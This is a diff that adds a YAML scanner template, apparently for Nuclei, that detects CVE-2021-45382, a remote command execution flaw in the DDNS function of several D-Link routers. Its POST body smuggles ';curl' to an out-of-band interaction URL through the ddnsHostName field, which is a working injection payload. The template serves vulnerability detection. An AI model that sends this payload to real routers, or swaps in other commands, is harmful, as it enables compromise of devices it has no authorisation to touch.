Create template for CVE-2021-45382

http/cves/2021/CVE-2021-45382.yaml

@@ -0,0 +1,30 @@
+id: CVE-2021-45382
+
+info:
+  name: D-Link Remote Command Execution 
+  author: king-alexander
+  severity: critical
+  description: |
+    There is a remote command execution vulnerability via the DDNS function in the ncc2 binary file that affects multiple D-Link routers. 
+  impact: |
+    Successful exploitation of this vulnerability could lead to system compromise.
+  remediation: |
+    The affected products are end-of-life and should be disconnected if still in use.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-45382
+    - https://github.com/doudoudedi/D-LINK_Command_Injection1/blob/main/D-LINK_Command_injection.md#poc
+  tags: cve,cve2021,dlink,kev,rce
+
+http:
+  - method: POST
+    path:
+      - "{{Host}}/ddns_check.ccp"
+    # Neither the ddnsHostName or ddnsUsername field sanitize input. For simplicty, I use dnsHostname to achieve
+    # remote code execution.
+    body: "ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername=admin&ddnsPassword=123123123"
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"